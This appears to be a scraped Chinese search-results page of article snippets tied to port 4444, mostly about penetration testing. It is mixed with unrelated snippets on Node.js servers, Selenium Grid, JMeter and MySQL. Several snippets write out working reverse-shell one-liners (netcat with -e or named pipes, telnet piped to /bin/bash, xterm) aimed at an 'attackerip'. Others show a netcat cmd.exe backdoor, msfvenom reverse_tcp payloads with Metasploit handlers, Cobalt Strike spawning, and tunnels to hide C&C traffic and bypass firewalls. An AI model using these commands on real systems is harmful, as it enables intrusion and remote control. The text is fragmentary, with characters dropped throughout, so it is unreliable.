展开

关键词

Cobalt Strike Spawn & Tunnel

:4444 [+] host called home, sent: 200296 bytes 按照反向转发的通常功能,它将侦听到达 4444 的流量并将其转发到 184.105.181.155 在这种情况下,我在 Windows 上运行 CS 客户,在 Ubuntu 中使用 WSL2 运行 msfconsole。将多处理程序设置为侦听0.0.0.0:4444。 ssh 转发的恶作剧的情况下将所有的流量隧道传输回来使用,真的很酷。 您可以推断,这是一种生成反向转发的通用方法,该转发将通过隧道返回到 Cobalt Strike 的主机,而不是 Team Server。 在我对主机进行某种 RCE(例如,MS SQL 盒上的 xp_cmdshell)并且我想执行不适合 RCE 方法的大型负载的情况下,我经常使用反向转发。

22030

Linux下终实现文件上传与反弹

有着几乎一样的语法和功能 #登录 sftp -o port=1000 [email protected] ip #上传 put /path/filename(本地主机) /path/filename(远主机 ) #下载 get /path/filename(远主机) /path/filename(本地主机) 常用反弹脚本 描述:在渗透测试中常常需要进行反弹Shell来证明该漏洞的危害,所以再Linux 4444 1>/tmp/backpipe nc -lvnp 4444 #Attack ? 方式2 #Client # 如果 -e 参数被禁用,可以尝试以下命令 rm -f /tmp/p; mknod /tmp/p p && nc 192.168.200.252 4443 0</tmp/ >/tmp/f #Attacker nc -lvnp 4444 telnet命令反弹shell 方式1 描述:攻击需要监听两个,一个4444执行命令另一个8888接受执行命令后的结果;

52240
  • 广告
    关闭

    腾讯云618采购季来袭!

    一键领取预热专享618元代金券,2核2G云服务器爆品秒杀低至18元!云产品首单低0.8折起,企业用户购买域名1元起…

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    Netcat基础

    Netcat在网络应用中既可以当做服务器,开启本机一个监听,也可以作为客户向其他服务器发起连接。所以,文件传输,即是在两分别运行Netcat。 nc -L -p 4444 >receivedfile.zip 此处-L启动监听模式(即作为服务器),开启4444,将接受到的数据写入到文件somefile.zip中。 nc 192.168.1.43 4444 <testfile.zip 4、开启后门 nc -L -p 4444 -e cmd.exe 以监听模式启动Netcat,开启TCP4444,在与客户成功建立连接后 在客户,直接连接目标机的4444即可。 nc 192.168.1.43 4444 5、转发 mkfifobackpipe nc-l 12345 0<backpipe | ncwww.google.com 801>backpipe 此处开启

    8820

    nodejs创建一个简单的服务器

    创建一个服务器 1.首先引入NodeJS中的HTTP模块; 2.创建一个server,在这里可以对前返回做出处理 3.监听 const http = require("http"); // console.log("----"); //向前台写东西,输出 res.write("abc"); //结束 res.end(); }); //监听--等着 //listen server.listen(4444); 4.进入命令行,cd到改js的目录,执行该js 执行命令: node xxx.js image.png 5.打开浏览器,输入localhost+监听的 的请求返回的都abc; createServer的返回参数req中存放中所有请求相关的内容,包括url,我们可以根据url对请求进行处理 const http = require("http"); res.write("404"); break; } //结束 res.end(); }); //监听--等着 //listen

    18320

    渗透测试之转发与代理 常用转发方法

    0x00 前言 ---- 在渗透测试中,经常会使用到转发和代理。 转发是转发一个网络从一个网络节点到另一个网络节点的行为。 如果Client要对Server的多个进行扫描(或是多个Server的多个),逐个配置转发规则很不现实。 为了提高效率,这里可以使用代理,配置一次规则即可。 /ew_for_linux -s lcx_tran -l 8888 -f 192.168.111.103 -g 4444 [/crayon] 4、Linux系统(CentOS)下的常用转发方法 Transit 同Ubuntu,此处省略 3、使用HTran实现转发 同Ubuntu,此处省略 4、使用EarthWorm实现转发 同Ubuntu,此处省略 0x03 转发——反向连接 ---- 0、应用场景 1.建立通道 连接内网服务器的指定 测试环境如下图 ?

    2K30

    内网渗透常用转发与代理工具枚举

    slave成对使用) 2)映射(tran) 1、lcx 内网转发 1.内网主机上执行:lcx.exe –slave 公网主机ip 公网主机 内网主机ip 内网主机 例如: lcx.exe -slave 公网主机ip 4444 127.0.0.1 3389 把内网主机的 3389 转发到具有公网ip主机的 4444 2.公网主机 上执行 Lcx.exe –listen 公网主机 1 公网主机2 例如: lcx.exe –listen 4444 5555 意思是监听公网主机本机的 4444 请求,并将来自 4444 的请求传送给 5555 。 2、本地转发 由于防火墙限制,部分如3389无法通过防火墙,此时可以将该目标主机的3389透传到防火墙允许的其他,如53, 目标主机上执行: lcx -tran 53 目标主机ip /rcsocks -l 4444 -p 5555 -vv 内网主机上执行: ./rssocks –vv –s 公网主机ip:5555 这时本地主机可以通过访问公网主机的 4444 访问内网主机。

    1.5K20

    【测试】Selenium Grid测试

    启动Hub -role hub表示启动运行hub; -port是设置号,hub的默认4444 -maxSession为最大会话请求,这个参数主要要用并发执行测试用例,默认是1 java -jar c:/third/selenium-server-standalone-3.5.3.jar -role hub -maxSession 10 -port 4444 ? 验证Hub控制台 http://192.168.43.58:4444/ ? 5555:指定node节点 -hub http://localhost:4444/grid/register:表示hub机地址 -maxSession 5:node节点最大会话请求 -browser driver.findElement(By.cssSelector("#kw")).sendKeys("hadoop" + Keys.ENTER); //获得当前窗url

    46130

    利用 TCP 隧道让内网不出网主机上线 MSF

    /tcptunnel --local-port=1080 --remote-port=4444 --remote-host=192.168.0.120 --fork --buffer-size=8192 --stay-alive 命令执行成功之后,会监听 1080 ,然后将该收到的所有数据转发至 192.168.0.120 的 4444 。 windows/meterpreter/reverse_tcp lhost=192.168.142.110 lport=1080 -f exe -o shell.exe 远程连接的 IP 填跳板机的 IP,填 1080,然后使用 msf 监听 4444: msf6 > use exploit/multi/handler [*] Using configured payload generic/shell_reverse_tcp multi/handler) > set LHOST 192.168.0.120 LHOST => 192.168.0.120 msf6 exploit(multi/handler) > set LPORT 4444

    12110

    利用SSH隧道加密、隐蔽C&C通信流量

    SSH 转发能够提供两大功能:1、加密 SSH Client 至 SSH Server 之间的通讯数据。2、突破防火墙的限制完成一些之前无法建立的 TCP 连接。 SSH转发有本地转发、远程转发和动态 转发三种。本次实验主要以本地转发为例。本地转发主要使用SSH的 -L参数解释: ? (1) 第1部分,-L选项表示使用“本地转发”建立ssh隧道。 “本地转发”表示本地的某个上的通讯数据会被转发到目标主机的对应。 (2) 第2部分表示:通讯数据会从本地的9906上被转发,最终被转发到10.1.0.2的3306。 plink.exe -ssh -i sshrsa.ppk am00n@192.168.81.137 -L 4444:192.168.81.137:4444 将本地4444)转发到远程目标主机(192.168.81.137 )的目标(4444)。

    78310

    记一次绕过防火墙反弹转发姿势小结

    0x02 Lcx 常规内网环境可以直接使用Lcx.exe将指定转发出来,然后在本地连接1234即可。 <ConnectPort> 发送<TransmitPort> -tran 连接<ConnectPort> 发送主机<TransmitHost> 发送<TransmitPort> 在《Metasploit bind_tcp实战应用》文中的注意事项提过:如果reverse_tcp反向连接被拦截后再尝试更换80、443、8080,这几个很少会被拦截,经过实际测试发现只需将监听改为 基友@darkz3r提示,他一般都是使用443做为监听,抱着试一试的态度没想到还真成功了,据他说国外黑阔也经常用443来监听。 ? ? (4) Reverse_https 前边我们测试的Reverse_tcp监听1234和reverse_http监听4444都被防火墙拦截了,但在测试reverse_https监听4444时发现成功绕过防火墙限制获得

    52220

    生成msf常用payload

    使用上面的命令生成一个exe的payload,命令如下: msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.88.128 LPORT=4444 复制shell.exe到Windows机器,然后kali下开启msf使用如下命令监听4444: msfconsole use exploit/multi/handler set PAYLOAD windows /meterpreter/reverse_tcp set LHOST 192.168.88.128 set LPORT 4444 set ExitOnSession false exploit -j -f raw > shell.php 在kali上使用msf执行下面的命令,监听4444: msfconsole use exploit/multi/handler set PAYLOAD php -f raw > shell.py 在kali上使用msf执行下面的命令,监听4444: msfconsole use exploit/multi/handler set PAYLOAD cmd/

    96200

    代理与转发常用工具汇总

    5555 nps nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。 用于目标服务器在内网或做了策略的情况下连接目标服务器内部开放。 ,就相当于访问了3.3.3.3的3389。 第二种用法: 1.1.1.1: lcx -tran 2222 2.2.2.2 3389 然后,访问1.1.1.1的2222,就相当于访问了2.2.2.2的33894444 telnet 1.1.1.1 4444 第二种用法:反向连接 在公网主机(2.2.2.2)上监听: 2.2.2.2 nc -lvp 4444 在内网主机(1.1.1.1)上远程回连:

    85920

    kali渗透测试工具方法

    Kali nc -nv 192.168.2.12 4444 正向shell Windows nc -nlvp 4444 -e cmd.exe Kali nc -nv 192.168.2.12 4444 反向shell Windows nc -nlvp 4444 Kali nc -nv 192.168.2.12 4444 -e /bin/bash 文件传输 Windows nc -nlvp 4444 > incoming.exe Kali nc -nv 192.168.2.12 它支持针对网络层、协议、主机、网络或的过滤,并提供and、or、not等逻辑语句来帮助你去掉无用的信息。 192.168.2.10 -r <capture.pcap> 指定目的IP获取数据包文件中的数据 tcpdump -n dst host 192.168.2.12 -r <capture.pcap> 指定获取数据包文件中的数据

    42100

    Selenium 系列篇(七):分布式

    将命令分发给 Node 来执行 通过 -role 参数,指定 hub 或 node,来启动主节点和代理节点,默认 Hub 的号是 4444,node 的号是 5555 需要注意的是,如果在一台 PC 上启动多个 Node,需要利用 -port 参数显式指定不同的号 # 启动一个主节点Hub # 参数:-role hub java -jar selenium-server-standalone -3.141.59.jar -role hub # 启动多个代理节点 # 注意:如果在同一台机器上,需要利用 -port 定义不同的号 java -jar selenium-server-standalone 实战 实际项目中,使用 Selnium Grid 完成分布式的操作步骤如下: 第 1 步,在本机启动一个 Hub 主节点,可以显式指定号,或者保持默认的:4444 # 启动一个hub java - # 启动一个代理节点Node # 注意:同一IP地址,号不能相同 java -jar selenium-server-standalone-3.141.59.jar -role node -port

    53030

    linux下反弹shell的姿势

    0x04 /bin/sh | nc attackerip 4444 0x05 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p Telnet telnet客户作为一个远程管理设备的软件,也可以作为反弹shell的软件 0x01 rm -f /tmp/p; mknod /tmp/p p && telnet attackerip 4444 0 /tmp/p 0x02 telnet attackerip 4444 | /bin/bash | telnet attackerip 4445 远程服务器监听tcp的4445 常见脚本 python xterm xterm是一个X Window System上的标准虚拟终。 xterm -display 10.0.0.1:1 以上命令在目标服务器上执行会反连shell到10.0.0.1的6001

    46600

    Jmeter系列(35)- 使用 ServerAgent 监控服务器

    ServerAgent 放到 Window 电脑的目录下,然后直接双击运行 startAgent.bat 即可 划重点 启动 ServerAgent 的前提是系统已安装配置好 Java 环境 默认占用4444 启动 ServerAgent 可能会出现的问题 被占用 杀掉占用 4444 的进程 ? 先查出 4444 是什么进程占用 然后查看进程详情,确认是否能杀掉 如果可以,则杀掉、 ServerAgent 通过其他启动 . /startAgent.sh --udp-port 0 --tcp-port 1234 0 代表不开启该,一般我们只用 tcp 足以 ? 未对外开放 如果服务器开启了防火墙,而且之前没用过 4444 ,那么该很可能会被禁用 为了解决防火墙和开放的问题,可以参考这篇博文:https://www.cnblogs.com/poloyy

    1.9K10

    LAMP安装mysql 时遇到的问题汇总

    1: 缺少 libaio 包, libaio是Linux下的一个异步非阻塞方式读写文件的接。 1 2 3 [[email protected] MySQL]# . 被占用 1 2 3 4 WSREP_SST: [INFO] Evaluating socat -u TCP-LISTEN:4444,reuseaddr stdio | tar xfi - --recursive-unlink  does not look like a tar archive tar: Exiting with failure status due to previous errors 解决办法,找到占用的程序 ,杀掉(比较暴力,也可以换,但是初次安装为简单起见,暴力) Solution: 1 2 3 4 5 6 7 8 [[email protected] ~]# lsof -i :4444   lsof    [[email protected] ~]# lsof -i :4444

    58060

    红队培训班作业 | 特征修改

    文章来源|MS08067 红队培训班第14节课作业 本文作者:某学员A(红队培训班2期学员) 按老师要求尝试完成布置的作业如下: 1.修改Cobalt Strike默认监听: 2.修改Cobalt f exe -o test.exe”生成反弹shell,靶机执行该反弹shell后反弹至VPS的msf上: 将VPS的msf派生到cs,完成从 靶机->VPS_msf:12345->VPS_cs:4444 : 5.cs转msf 通过cs生成反弹shell: 靶机执行该反弹shell后反弹至VPS的cs上: 用msf监听4444: 右键点击反弹会话->spawn,派生到msf监听的4444

    19320

    扫码关注云+社区

    领取腾讯云代金券